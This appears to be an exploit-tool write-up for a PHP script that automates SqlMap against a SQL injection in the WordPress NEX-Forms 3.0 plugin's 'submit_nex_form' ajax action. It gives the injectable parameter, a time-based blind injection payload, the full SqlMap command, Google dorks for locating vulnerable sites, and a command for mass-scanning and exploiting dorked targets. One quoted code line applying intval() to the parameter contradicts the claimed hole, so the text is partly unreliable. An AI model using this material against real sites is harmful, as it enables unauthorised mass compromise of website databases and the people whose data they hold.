WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability
MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability
# AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
# Vulnerability discovered by: Claudio Viviani
- VENTOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Vulnerability Description
The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
- Tool Description
Automation script explores targets with the help of SqlMap tool Execute command SqlMap
{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
--technique=B -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent
--answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1
- GET VULN
SQL can be injected in the following GET
GET VULN: nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex: http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
- XPL inject DBMS: 'MySQL'
Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
- GOOGLE DORK
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
- COMMAND --help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'
- EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
- DOWNLOAD INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
- REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli